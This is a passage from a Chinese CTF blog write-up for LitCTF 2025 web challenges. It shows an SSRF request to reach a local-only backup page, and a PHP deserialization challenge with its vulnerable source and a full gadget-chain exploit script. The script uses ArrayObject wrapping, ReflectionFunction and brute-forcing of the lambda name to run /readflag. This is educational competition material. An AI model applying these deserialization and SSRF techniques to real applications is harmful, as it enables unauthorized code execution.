class="hljs-subst">&#123;response.status_code&#125;</span>&quot;</span>)<br><span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;请求失败：<span class="hljs-subst">&#123;<span class="hljs-built_in">str</span>(e)&#125;</span>&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>运行脚本后，便能够访问仪表盘页面</p>
<p><img src="/2025/05/28/LitCTF2025-web/es3.png" srcset="/img/loading.gif" lazyload></p>
<p>访问&#x2F;backup&#x2F;8e0132966053d4bf8b2dbe4ede25502b.php，提示非本地用户</p>
<p>在&#x2F;login.html页面的源码中，发现api.js，查看其源码发现可以打ssrf</p>
<p><img src="/2025/05/28/LitCTF2025-web/es4.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">api</span>/sys/urlcode.php?url=<span class="hljs-number">127.0.0.1</span>/backup/<span class="hljs-number">8</span>e0132966053d4bf8b2dbe4ede25502b.php<br></code></pre></td></tr></table></figure>

<p><img src="/2025/05/28/LitCTF2025-web/es5.png" srcset="/img/loading.gif" lazyload></p>
<p>在上一级目录中发现327a6c4304ad5938eaf0efb6cc3e53dc.php</p>
<p><img src="/2025/05/28/LitCTF2025-web/es6.png" srcset="/img/loading.gif" lazyload></p>
<p>直接访问拿到flag</p>
<h3 id="君の名は"><a href="#君の名は" class="headerlink" title="君の名は"></a>君の名は</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">create_function</span>(<span class="hljs-string">&quot;&quot;</span>, <span class="hljs-string">&#x27;die(`/readflag`);&#x27;</span>);<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Taki</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$musubi</span>;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$magic</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__unserialize</span>(<span class="hljs-params"><span class="hljs-keyword">array</span> <span class="hljs-variable">$data</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;musubi = <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;musubi&#x27;</span>];<br>        <span class="hljs-variable language_">$this</span>-&gt;magic = <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;magic&#x27;</span>];<br>        <span class="hljs-keyword">return</span> (<span class="hljs-variable language_">$this</span>-&gt;musubi)();<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$func</span>,<span class="hljs-variable">$args</span></span>)</span>&#123;<br>        (<span class="hljs-keyword">new</span> <span class="hljs-variable">$args</span>[<span class="hljs-number">0</span>](<span class="hljs-variable">$args</span>[<span class="hljs-number">1</span>]))-&gt;&#123;<span class="hljs-variable language_">$this</span>-&gt;magic&#125;();<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Mitsuha</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$memory</span>;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$thread</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;memory.<span class="hljs-variable language_">$this</span>-&gt;thread;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">KatawareDoki</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$soul</span>;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$kuchikamizake</span>;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$name</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        (<span class="hljs-variable language_">$this</span>-&gt;soul)-&gt;<span class="hljs-title function_ invoke__">flag</span>(<span class="hljs-variable">$this</span>-&gt;kuchikamizake,<span class="hljs-variable">$this</span>-&gt;name);<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;call error!no flag!&quot;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$Litctf2025</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;Litctf2025&#x27;</span>];<br><span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/^[Oa]:[\d]+/i&quot;</span>, <span class="hljs-variable">$Litctf2025</span>))&#123;<br>    <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$Litctf2025</span>);<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;把O改成C不就行了吗,笨蛋!～(∠・ω&lt; )⌒☆&quot;</span>;<br>&#125; <br></code></pre></td></tr></table></figure>

<blockquote>
<p>首先是create_function(“”, ‘die(<code>/readflag</code>);’);会创建一个匿名函数（lambda样式），其创建与执行过程等价于(<a target="_blank" rel="noopener" href="https://www.cnblogs.com/zzjdbk/p/12980483.html">https://www.cnblogs.com/zzjdbk/p/12980483.html</a>)</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">lambda_1</span>(<span class="hljs-params"><span class="hljs-string">&quot;&quot;</span>, <span class="hljs-string">&quot;die(/readflag);&quot;</span></span>) </span>&#123;<br>	<span class="hljs-keyword">return</span> <span class="hljs-keyword">die</span>(/readflag);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>那么链子就很清晰了</p>
<figure class="highlight leaf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs leaf">Taki<span class="hljs-punctuation">#</span><span class="hljs-keyword">__unserialize</span><span class="hljs-params">()</span>==&gt;Mitsuha<span class="hljs-punctuation">#</span><span class="hljs-keyword">__invoke</span><span class="hljs-params">()</span>==&gt;KatawareDoki<span class="hljs-punctuation">#</span><span class="hljs-keyword">__toString</span><span class="hljs-params">()</span>==&gt;Taki<span class="hljs-punctuation">#</span><span class="hljs-keyword">__call</span><span class="hljs-params">()</span><br></code></pre></td></tr></table></figure>

<p>现在就要找一个原生类去调用这个匿名函数</p>
<p>了解到ReflectionFunction的invoke方法可以调用函数</p>
<p>最后用一个类来对链子进行包装，然后开头的O就会被自动转换为C</p>
<blockquote>
<p>可使用的类：</p>
<p>ArrayObject::unserialize</p>
<p>ArrayIterator::unserialize</p>
<p>RecursiveArrayIterator::unserialize</p>
<p>SplObjectStorage::unserialize</p>
</blockquote>
<p>exp</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Taki</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$musubi</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$magic</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$func</span>,<span class="hljs-variable">$args</span></span>)</span>&#123;<br>        (<span class="hljs-keyword">new</span> <span class="hljs-variable">$args</span>[<span class="hljs-number">0</span>](<span class="hljs-variable">$args</span>[<span class="hljs-number">1</span>]))-&gt;&#123;<span class="hljs-variable language_">$this</span>-&gt;magic&#125;();<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Mitsuha</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$memory</span>;    <br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$thread</span>;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">KatawareDoki</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$soul</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$kuchikamizake</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        (<span class="hljs-variable language_">$this</span>-&gt;soul)-&gt;<span class="hljs-title function_ invoke__">flag</span>(<span class="hljs-variable">$this</span>-&gt;kuchikamizake,<span class="hljs-variable">$this</span>-&gt;name);<br>    &#125;<br>&#125;<br><br><br><span class="hljs-comment">// Taki#__unserialize()==&gt;Mitsuha#__invoke()==&gt;KatawareDoki#__toString()==&gt;Taki#__call()</span><br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Taki</span>;<br><span class="hljs-variable">$a</span>-&gt;musubi = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Mitsuha</span>;<br><span class="hljs-variable">$a</span>-&gt;musubi-&gt;memory = <span class="hljs-keyword">new</span> <span class="hljs-title class_">KatawareDoki</span>;<br><span class="hljs-variable">$a</span>-&gt;musubi-&gt;memory-&gt;kuchikamizake = <span class="hljs-string">&quot;ReflectionFunction&quot;</span>;<br><span class="hljs-variable">$a</span>-&gt;musubi-&gt;memory-&gt;name = <span class="hljs-string">&quot;\\00lambda_1&quot;</span>;<br><span class="hljs-variable">$a</span>-&gt;musubi-&gt;memory-&gt;soul = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Taki</span>;<br><span class="hljs-variable">$a</span>-&gt;musubi-&gt;memory-&gt;soul-&gt;magic = <span class="hljs-string">&quot;invoke&quot;</span>;<br><br><span class="hljs-variable">$aa</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Arrayobject</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$aa</span>));<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>还要注意的一点是匿名函数的函数名是会改变的，在web页面中打开php文件，每刷新一次函数名的数字就会加一</p>
<p>初次进入靶机后重新进入靶机提交的payload，由1改为了2</p>
<p><img src="/2025/05/28/LitCTF2025-web/j1.png" srcset="/img/loading.gif" lazyload></p>
<blockquote>
<p><code>create_function()</code> 生成的函数名遵循 <code>lambda_&lt;数字&gt;</code> 的格式（如 <code>lambda_1</code>、<code>lambda_2</code>），其中数字是 PHP 内部维护的计数器。每次调用 <code>create_function()</code> 时，计数器递增，生成唯一名称。</p>
<p>在 PHP 中，<code>create_function()</code> 生成匿名函数时使用的计数器（即 <code>lambda_&lt;数字&gt;</code> 中的数字）本身<strong>没有明确的理论上限</strong>，其范围取决于 PHP 进程的整数类型（32 位系统最大为 <code>2^31-1</code>，64 位系统最大为 <code>2^63-1</code>）。但在<strong>实际场景中，这个计数器的有效范围非常小</strong>。</p>
<p>多个ai回答，当计数器达到上限时不会重新置为1，而是会发生整数溢出，如果是有符号整数从负数开始重新计数，如果是无符号整数那么从0开始重新计数，但是我将payload改为lambda_0(如果计数器范围很小的话，有符号整数经过多次爆破也会回到0)时并没有拿到flag，而在一次完整的爆破过程中lambda_1有多个请求拿到了flag，不知道是不是ai错了，看php而文档也并没有看到相关内容</p>
</blockquote>
<p>通过bp爆破拿到flag，我这里提交了一个无关紧要来控制爆破次数</p>
<p><img src="/2025/05/28/LitCTF2025-web/j2.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/2025/05/28/LitCTF2025-web/j3.png" srcset="/img/loading.gif" lazyload></p>
<p>看了官方的wp还有一个非预期直接在return ($this-&gt;musubi)();处调用匿名函数，原理是一样的就不写了，贴个官方wp（<a target="_blank" rel="noopener" href="https://godyu.com/13917.html%EF%BC%89">https://godyu.com/13917.html）</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/ctf/" class="category-chain-item">ctf</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ctf/" class="print-no-link">#ctf</a>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>LitCTF2025_web</div>
      <div>http://example.com/2025/05/28/LitCTF2025-web/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Lysander-xu</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年5月28日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/07/12/cryptohack/" title="cryptohack">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">cryptohack</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/05/23/NewStar2024-web/" title="NewStar2024_web">
                        <span class="hidden-mobile">NewStar2024_web</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
